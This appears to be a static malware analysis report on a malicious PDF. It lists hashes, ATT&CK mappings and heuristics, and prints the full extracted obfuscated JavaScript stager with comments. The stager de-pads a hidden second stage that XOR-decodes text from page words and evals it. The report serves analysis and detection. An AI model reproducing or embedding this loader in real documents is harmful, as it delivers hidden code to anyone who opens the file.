Malicious PDF — malware analysis report

Static analysis result for SHA-256 934fe64c44e00c0d…

MALICIOUS

PDF

5.6 KB Authoring application: Jidagelageno (via a5c5bYlojoppekaxopqi) First seen: 2026-05-08
MD5: 6da13d9131b29903b06eb8b57152243b SHA-1: 78ebda7e8ada1f5c0e56cf521902fbdae175537e SHA-256: 934fe64c44e00c0dc7dd56871da09d9d36d0e56ca5b10185b2e481d4f8e824af
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

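The PDF file contains embedded JavaScript, flagged by the 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_PAGE_WORD_XOR_EVAL_STAGER' heuristics. The stager exists to execute further JavaScript, which is a common technique for downloading and executing additional malicious content. The extracted script shown below only evidences JavaScript execution inside the PDF reader; the T1059.001 (PowerShell) mapping is not directly supported by this static artifact and should be treated as unconfirmed until the decoded stage has been examined. The authoring-application metadata also provides potential indicators.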

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0xF52 1346 bytes
SHA-256: c510f8c6a5031d17c6606a6a4e88ede1c3452bf51c2d06efb7ba03d3692fec56
Preview script
First 1,000 lines of the extracted script
// Empty string. It is later passed as the replacement value when the padding
// characters are stripped out of xQN, and the staged script text also uses a
// variable of this name as its join separator.
var rM='';
// Builds the string "length" from two fragments. Nothing in the visible script
// reads `n`, so this looks like filler — confirm against the full sample.
var n=String("leng"+"th");
// Decoy helper: returns xQ+kDU and, as side effects, assigns the undeclared
// variable jQ and sets then increments this.lG. No call to fCP appears in the
// visible script, so it presumably exists only as filler that varies the
// file's content between samples — confirm against the full sample.
function fCP(xQ,kDU){jQ=["vE","qDG","cT"];this.lG=32766;this.lG++; return xQ+kDU};
// Character class of the padding characters (q, 4, $, 9, L, R) that are
// interleaved into the staged script text below. The g flag makes the later
// replace call remove every occurrence.
var yL=/[q4\$9LR]/g;
// "prototype", assembled from fragments. Not read anywhere in the visible
// script; presumably filler.
var lS="pro"+"tot"+"ype";
// "eval" as a String object, assembled from fragments. hE uses it as a
// computed property name, so the evaluation is never written as a direct call.
var yR=new String("eva"+"l");
// "replace", assembled the same way and used below as a computed method name.
var cZ="rep"+"lac"+"e";
// Second-stage script, stored as a string literal with the padding characters
// scattered through its keywords, identifiers and API names (getPageNthWord,
// getPageNumWords, substr, parseInt, toString are all split), so plain string
// matching on those names does not hit the raw file.
// Once the padding is removed, the text concatenates the words of a page
// obtained through getPageNumWords/getPageNthWord, reads the result two
// characters at a time as hexadecimal, XORs each value with a constant, and
// passes the decoded text to app.eval inside a try/catch whose catch block is
// empty, so any failure is silent.
// Analysis note: this literal is evidence; keep it byte-for-byte when copying
// the sample into a report or a rule test case.
var xQN="varq yN=tRhis.jq;tr$y {fOq={yNO:\'eval\',sX:\'getPageN9thWord\',lW:\'s$uLbstr\',uVQR:\'pag4eNum\',eH:\'length\',xO:\'getPa9geNum4Words\',mD:\'join\'};rSB=16;jW = 83 ;kN=q0;uN=[];nCF=332;eN=L\'toStriRng\';cB=2;rM=\'\';tS9=\'\\\\x\';nC=String;fE=\'\';eD=\'\';iZC=1;;u4VY=yN[fO.xO](yN[fO.uVQ]);for(oTR=4kqN$;oT<u9VY;oT++){var mT=yN[fO.sX](yN[fO.uVQ],oT,iZC);eD=[eD,mT][fO.mD](9rM);;}for4(oT=k$Nq;oT<eD[fOq.eH];oT+=qcB){t=eD[$fO.lW$](oT,cB);rC=parseInLt(t,rSB);aH=r4C^jW;lC=aH[LeN](rSB);lC=(lCR[fO.e9H]==iZC)?R\'0\'R+lC9:lC;app[fRO.yNOq](\'yP=(\"\'+tS+lCL+\'\");\');uqN9.push(yP);}fER=$uN[fO.mD](rM);rLEH=fE[fO.eH]-nCF;yN.cZM=(fE[fO.lW](rEH));RyN.rY=(fE[fO.lW](kN,rqEH));app[fOq.yNO](yN.rY);} catch(fE){}";

;


// Equivalent to xQN.replace(yL, ''): strips every padding character, leaving
// the staged script as evaluable text. For static analysis, the value of xQN
// after this line is the de-padded stage and can be inspected without
// evaluating it.
xQN=xQN[cZ](yL, rM);

// Captures the top-level `this` so it can be handed to hE.
// NOTE(review): in a PDF document-level script this is presumably the Doc
// object — confirm in the viewer's scripting context.
var rG=this;
// Implicit global counter that is never read in the visible script; filler.
cH=5603;cH++;
// Launcher, intended to be called with `new`. It stores kF on the new object
// (as uL and j) and then calls xY.j[yR](rY); with yR holding "eval" that is
// kF.eval(rY), so the text in rY is evaluated as code.
// The other assignments (lWX, pE, rQ, uLWX, bA, rAZ, oTI) are never read
// inside the function and appear to be filler around the one call that matters.
function hE(kF,rY){lWX={fK:false}; var xY=this; var pE={iL:24712}; xY.uL=kF; var rQ=new String();var uLWX=["tW"]; xY.j=kF;  var bA=false;rAZ=["vSN"];oTI=["oZ"]; xY.j[yR](rY)};
// The next three lines set properties and variables (kB, eL, tE, mTW) that
// nothing in the visible script reads; they look like filler.
this.kB='';
this.eL=32343;this.eL++;
var tE=["sV","pM","uF"];this.mTW=2004;this.mTW-=75;
// The staged script text also assigns and reads a variable named kN (as a
// start index), so this declaration pre-creates that name at the top level.
var kN=0;
;


// Trigger: constructing hE with the captured top-level `this` and the
// de-padded stage text is what evaluates the stage. Everything above this line
// is setup. When triaging the sample, stop here and examine xQN rather than
// letting this constructor run.
var bCD=new hE(rG,xQN);
// Trailing implicit globals and locals that are not read in the visible
// script; filler.
gP=4385;gP--;aT=22733;aT--;
var dC=false;hKV={};

;